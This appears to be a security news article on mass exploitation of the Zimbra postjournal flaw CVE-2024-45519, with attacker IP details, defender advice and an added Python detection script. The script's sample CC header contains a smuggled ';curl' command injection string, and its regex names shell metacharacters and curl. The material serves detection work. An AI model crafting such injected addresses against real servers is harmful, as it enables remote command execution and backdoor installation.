A critical vulnerability in Zimbra mail servers (CVE-2024-45519) has been actively exploited by attackers to remotely execute malicious commands.
Attacks were described as "mass exploitation" and used malicious emails sent from a single IP address to install a backdoor.
The damage from ongoing exploitation is likely to be contained, with the observed payloads doing nothing beyond downloading a file.
Exploitation attempts are indiscriminate and the vulnerability is easy to exploit, but the reliability of the attacks is unclear.
Defenders should monitor odd CC/To addresses and logs for outbound connections to remote IP addresses.
A patch has been released by Zimbra, and a proof-of-concept exploit has been created, but its reliability is uncertain.
A critical vulnerability in mail servers sold by Zimbra has been actively exploited by attackers, who are attempting to remotely execute malicious commands that install a backdoor. The vulnerability, tracked as CVE-2024-45519, resides in the Zimbra email and collaboration server used by medium and large organizations. When an admin manually changes default settings to enable the postjournal service, attackers can execute commands by sending maliciously formed emails to an address hosted on the server.
Security researcher Ivan Kwiatkowski, who first reported the in-the-wild attacks, described them as "mass exploitation." He stated that the malicious emails were sent from the IP address 79.124.49[.]86 and, when successful, attempted to run a file hosted there using the curl tool. Researchers from security firm Proofpoint took to social media later that day to confirm the report.
On Wednesday, security researchers provided additional details suggesting that the damage from ongoing exploitation was likely to be contained. Security researcher Ron Bowes reported that the "payload doesn't actually do anything—it downloads a file (to stdout) but doesn't do anything with it." He also stated that in the span of about an hour earlier Wednesday, his honeypot server received roughly 500 requests.
Another researcher at Proofpoint, Greg Lesnewich, provided more details on the attacks. He stated that while the exploitation attempts were indiscriminate in targeting, Proofpoint had not seen a large volume of them. Based on what the firm had researched and observed, exploiting this vulnerability was very easy, but they had no information about how reliable the exploitation was.
Lesnewich also mentioned that the rate of exploitation attempts had remained about the same since they first appeared on September 28th, with some variability in the number of attacks received by Proofpoint's honeypot servers. He noted that a PoC for the exploit was available and that the attack attempts seemed opportunistic. The fact that the attacker used the same server to send the exploit emails and to host second-stage payloads suggested that they did not have a distributed set of infrastructure for sending exploit emails and handling infections after successful exploitation.
Defenders protecting Zimbra appliances should be aware of odd CC or To addresses that look malformed or contain suspicious strings, as well as logs from the Zimbra server indicating outbound connections to remote IP addresses. Proofpoint has also warned that some of the malicious emails used multiple email addresses that, when pasted into the CC field, attempted to install a webshell-based backdoor on vulnerable Zimbra servers.
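The two checks described above, written up as an added example (this is not code from the article, Proofpoint or Zimbra): one function flags To/CC addresses that are malformed or carry shell metacharacters or the string "curl", the other matches log lines recording outbound connections against the source IP named in the article. The header values and log lines are constructed samples, and the log format and regex are assumptions to adapt to the real Zimbra log layout.

```python
import re

# Characters that have no place in a recipient address that a mail pipeline
# may hand to a shell; "curl" is included because the observed payloads used
# it to fetch a second stage (reported in the article; the rest is an assumption).
SHELL_META = re.compile(r'[`$|;&<>(){}]|\bcurl\b')

# Conservative addr-spec shape: local@domain.tld with no quoting or spaces.
ADDR_OK = re.compile(r'^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}$')

def suspicious_recipients(header_value):
    """Return the addresses in a raw To/CC header value that look malformed
    or contain shell metacharacters. Works on the raw header on purpose:
    a lenient address parser would strip the very strings we want to see."""
    flagged = []
    for raw in header_value.split(','):
        raw = raw.strip()
        if not raw:
            continue
        m = re.search(r'<([^>]*)>', raw)          # "Name <addr>" form
        addr = m.group(1).strip() if m else raw
        if SHELL_META.search(addr) or not ADDR_OK.match(addr):
            flagged.append(addr)
    return flagged

# IP the article reports as both sender of the exploit emails and host of
# the second-stage file; outbound connections to it are worth alerting on.
IOC_IPS = {"79.124.49.86"}

# Assumed log phrasing; adjust the pattern to the actual Zimbra log format.
OUTBOUND_RE = re.compile(r'connect(?:ion|ing)? to\s*(\d{1,3}(?:\.\d{1,3}){3})')

def outbound_hits(log_lines, ioc_ips=IOC_IPS):
    """Return the log lines that record an outbound connection to a watched IP."""
    return [line for line in log_lines
            if (m := OUTBOUND_RE.search(line)) and m.group(1) in ioc_ips]

# Constructed samples, not captured data.
CLEAN_HEADER = "Alice <alice@example.com>, bob@example.org"
BAD_HEADER = 'alice@example.com, "x;curl http://placeholder.invalid/s"@example.com'
SAMPLE_LOG = [
    "2024-10-02 12:00:01 zimbra postjournal[1234]: connection to 10.0.0.5:25",
    "2024-10-02 12:00:02 zimbra postjournal[1234]: connection to 79.124.49.86:80",
]

if __name__ == "__main__":
    print(suspicious_recipients(BAD_HEADER))
    print(outbound_hits(SAMPLE_LOG))
```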
The researchers at Project Discovery reverse-engineered the patch released by Zimbra and released a proof-of-concept exploit that demonstrated how it worked. However, their test of the vulnerability in their lab showed that the exploitation was not reliable. Despite this, CVE-2024-45519 remains a potential threat since attacks often improve over time as more people test them.
In light of these findings, all Zimbra users should install the patch as soon as practical and ensure that postjournal is enabled only when it is needed. The uncertain reliability of the exploit leaves open whether this should be considered a serious attack or just a minor issue.